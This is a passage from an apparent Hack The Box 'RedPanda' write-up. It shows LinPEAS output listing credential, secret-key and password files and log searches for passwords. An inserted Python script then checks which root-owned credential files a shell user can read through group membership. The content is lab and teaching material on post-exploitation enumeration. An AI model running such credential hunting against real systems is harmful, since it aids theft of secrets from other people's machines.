/usr/lib/python3/dist-packages/twisted/cred/__pycache__/credentials.cpython-38.pyc
/usr/lib/python3/dist-packages/twisted/cred/credentials.py
/usr/lib/systemd/system/multi-user.target.wants/systemd-ask-password-wall.path
/usr/lib/systemd/system/sysinit.target.wants/systemd-ask-password-console.path
/usr/lib/systemd/system/systemd-ask-password-console.path
/usr/lib/systemd/system/systemd-ask-password-console.service
/usr/lib/systemd/system/systemd-ask-password-plymouth.path
/usr/lib/systemd/system/systemd-ask-password-plymouth.service
#)There are more creds/passwds files in the previous parent folder
/usr/share/doc/git/contrib/credential
/usr/share/doc/git/contrib/credential/gnome-keyring/git-credential-gnome-keyring.c
/usr/share/doc/git/contrib/credential/libsecret/git-credential-libsecret.c
/usr/share/doc/git/contrib/credential/netrc/git-credential-netrc
/usr/share/doc/git/contrib/credential/netrc/t-git-credential-netrc.sh
/usr/share/doc/git/contrib/credential/osxkeychain/git-credential-osxkeychain.c
/usr/share/doc/git/contrib/credential/wincred/git-credential-wincred.c
/usr/share/man/man1/git-credential-cache--daemon.1.gz
/usr/share/man/man1/git-credential-cache.1.gz
/usr/share/man/man1/git-credential-store.1.gz
/usr/share/man/man1/git-credential.1.gz
#)There are more creds/passwds files in the previous parent folder
/usr/share/man/man7/gitcredentials.7.gz
/usr/share/man/man8/systemd-ask-password-console.path.8.gz
/usr/share/man/man8/systemd-ask-password-console.service.8.gz
/usr/share/man/man8/systemd-ask-password-wall.path.8.gz
/usr/share/man/man8/systemd-ask-password-wall.service.8.gz
#)There are more creds/passwds files in the previous parent folder
/usr/share/pam/common-password.md5sums
/var/cache/debconf/passwords.dat
/var/lib/cloud/instances/f97e41c8-944d-4b3f-a3a8-8db23afb94f3/sem/config_set_passwords
/var/lib/fwupd/pki/secret.key
/var/lib/pam/password
╔══════════╣ Checking for TTY (sudo/su) passwords in audit logs
╔══════════╣ Searching passwords inside logs (limit 70)
Binary file /var/log/journal/8e7b2e7692df48faa4e42d6cfc791ed2/user-1000.journal matches
[ 3.636139] systemd[1]: Started Forward Password Requests to Wall Directory Watch.
[ 3.808595] systemd[1]: Started Forward Password Requests to Wall Directory Watch.
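Two details in the LinPEAS output above are worth pulling together before moving on. The shell's own `id` line reports gid=1001(logs), while the per-user listing built from /etc/passwd shows woodenk with only group woodenk, so the `logs` membership comes from how the running process was started rather than from /etc/group. That group is exactly what grants read access to the root-owned /credits/damian_creds.xml and /credits/woodenk_creds.xml (mode -rw-r----- root:logs) and write access to /opt/panda_search/redpanda.log. The script below is an added example, not part of the original write-up or of LinPEAS: it takes the `id` line and a handful of `ls -l` lines and applies the Unix owner/group/other rule to say, per file, whether the current user can read or write it and which permission class decided that. The sample lines are copied from the output above except the redpanda.log entry, whose mode string is constructed to match its listing under "Interesting GROUP writable files"; the function and class names are this example's own.

```python
"""Triage `ls -l` lines from an enumeration run against the current `id`.

Added example (not the write-up's or LinPEAS's own code). Sample input is
copied from the LinPEAS output in the post; the redpanda.log line is
constructed, since the post only lists that file as group-writable.
"""
import re
from dataclasses import dataclass

# `id` line exactly as the reverse shell reported it.
ID_LINE = "uid=1000(woodenk) gid=1001(logs) groups=1001(logs),1000(woodenk)"

# ls -l style lines: the first four are from the output, the fifth is a
# constructed mode string consistent with "group logs can write it".
LS_LINES = """\
-rw-r----- 1 root logs 422 Sep 12 10:42 /credits/damian_creds.xml
-rw-r----- 1 root logs 426 Sep 12 10:54 /credits/woodenk_creds.xml
-rw-r----- 1 root woodenk 33 Sep 12 09:01 /home/woodenk/user.txt
-rw------- 1 root root 317 Jun 14 11:54 /etc/mysql/debian.cnf
-rw-rw-r-- 1 root logs 1024 Sep 12 11:30 /opt/panda_search/redpanda.log
-rwsr-xr-x 1 root root 163K Jan 19 2021 /usr/bin/sudo
"""

_NAME = re.compile(r"\d+\((?P<name>[^)]+)\)")
# mode, link count, owner, group, size, month, day, time-or-year, path
_LS_RE = re.compile(
    r"^(?P<mode>[-dlcbps][rwxsStT-]{9})\s+\d+\s+(?P<owner>\S+)\s+(?P<group>\S+)"
    r"\s+\S+\s+\S+\s+\S+\s+\S+\s+(?P<path>.+)$"
)


def parse_id(line):
    """Return (user_name, set of group names) from an `id` line.

    The primary gid is included even if it is absent from groups=, which is
    what matters when the gid was set by the service that spawned the shell.
    """
    user = re.search(r"uid=\d+\(([^)]+)\)", line).group(1)
    groups = {re.search(r"gid=\d+\(([^)]+)\)", line).group(1)}
    extra = re.search(r"groups=(\S+)", line)
    if extra:
        groups |= {m.group("name") for m in _NAME.finditer(extra.group(1))}
    return user, groups


@dataclass(frozen=True)
class Access:
    path: str
    owner: str
    group: str
    readable: bool
    writable: bool
    executable: bool
    via: str        # "owner", "group" or "other": the class that decided
    setuid: bool
    setgid: bool


def classify(mode, owner, group, user, groups):
    """Unix rule: owner bits if you own the file, else group bits if you are
    in its group, else other bits. Only the first matching class counts."""
    if user == owner:
        return "owner", mode[1:4]
    if group in groups:
        return "group", mode[4:7]
    return "other", mode[7:10]


def _bits(triplet):
    # 's'/'t' mean the exec bit is set together with setuid/setgid/sticky;
    # 'S'/'T' mean the special bit is set but exec is not.
    return triplet[0] == "r", triplet[1] == "w", triplet[2] in "xst"


def triage(id_line, ls_text):
    """Map each parsed path to an Access record for the user in id_line."""
    user, groups = parse_id(id_line)
    result = {}
    for raw in ls_text.splitlines():
        m = _LS_RE.match(raw.strip())
        if not m:
            continue  # skip anything that is not an ls -l line
        mode, owner, grp, path = m["mode"], m["owner"], m["group"], m["path"]
        via, triplet = classify(mode, owner, grp, user, groups)
        r, w, x = _bits(triplet)
        result[path] = Access(path, owner, grp, r, w, x, via,
                              setuid=mode[3] in "sS", setgid=mode[6] in "sS")
    return result


def interesting(accesses, user):
    """Paths owned by someone else that the user can still read or write."""
    return sorted(a.path for a in accesses.values()
                  if a.owner != user and (a.readable or a.writable))


if __name__ == "__main__":
    user, _ = parse_id(ID_LINE)
    for a in triage(ID_LINE, LS_LINES).values():
        flags = ("r" if a.readable else "-") + ("w" if a.writable else "-") \
            + ("x" if a.executable else "-")
        tag = "setuid " if a.setuid else ""
        print(f"{flags} via {a.via:<5} {tag}{a.path}")
    print("worth a second look:", interesting(triage(ID_LINE, LS_LINES), user))
```

The point of feeding it the shell's `id` line rather than /etc/group is the discrepancy noted above: a check that rebuilds membership from /etc/passwd and /etc/group would report woodenk as unable to read the two creds files or write the log, and would miss the only non-default access this user has.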
-
I have not found the right privilege-escalation path yet, so this post goes out as an SSTI injection write-up; I will update the article once I find it.
-
Anyone interested can head to Hack The Box: Hacking Training For The Best | Individuals & Companies and try escalating to root; the machine covered in this post is RedPanda.